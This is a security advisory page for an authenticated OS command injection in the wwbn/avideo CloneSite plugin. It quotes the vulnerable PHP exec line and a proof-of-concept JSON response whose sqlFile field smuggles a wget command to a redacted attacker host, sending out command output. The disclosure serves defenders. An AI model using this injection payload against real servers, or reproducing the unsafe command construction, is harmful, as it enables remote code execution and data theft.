GHSA-6vrj-ph27-qfp3
Suggest an improvement- Source
- https://github.com/advisories/GHSA-6vrj-ph27-qfp3
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/04/GHSA-6vrj-ph27-qfp3/GHSA-6vrj-ph27-qfp3.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-6vrj-ph27-qfp3
- Aliases
- Published
- 2023-04-27T23:53:45Z
- Modified
- 2024-02-16T08:21:56.770129Z
- Severity
-
- 8.8 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
- Summary
- Remote code injection in wwbn/avideo
- Details
-
WWBN Avideo Authenticated RCE - OS Command Injection
Description
An OS Command Injection vulnerability in an Authenticated endpoint
/plugin/CloneSite/cloneClient.json.phpallows attackers to achieve Remote Code Execution.Vulnerable code:
$cmd = "wget -O {$clonesDir}{$json->sqlFile} {$objClone->cloneSiteURL}videos/cache/clones/{$json->sqlFile}"; $log->add("Clone (2 of {$totalSteps}): Geting MySQL Dump file"); exec($cmd . " 2>&1", $output, $return_val);We can control
$objClone->cloneSiteURLthrough the admin panel clone site feature./plugin/CloneSite/cloneClient.json.phpsends a GET Request to{$objClone->cloneSiteURL}/plugin/CloneSite/cloneServer.json.php. I hosted a specially craftedcloneServer.json.phpthat prints the following JSON data{"error":false,"msg":"","url":"https:\/\/REDACTED/\/","key":"REDACTED","useRsync":1,"videosDir":"\/var\/www\/html\/[demo.avideo.com](http://demo.avideo.com/)\/videos\/","sqlFile":"Clone_mysqlDump_644ab263e62d6.sql; wget [http://REDACTED:4444/`pwd`](http://redacted:4444/pwd) ;#","videoFiles":[],"photoFiles":[]}Send a GET Request to
/plugin/CloneSite/cloneClient.json.phpthen remote code execution is achieved.
- Database specific
{ "nvd_published_at": "2023-04-28T16:15:10Z", "cwe_ids": [ "CWE-78" ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2023-04-27T23:53:45Z" }- References
Affected packages
Packagist / wwbn/avideo
Package
- Name
- wwbn/avideo
- Purl
- pkg:composer/wwbn/avideo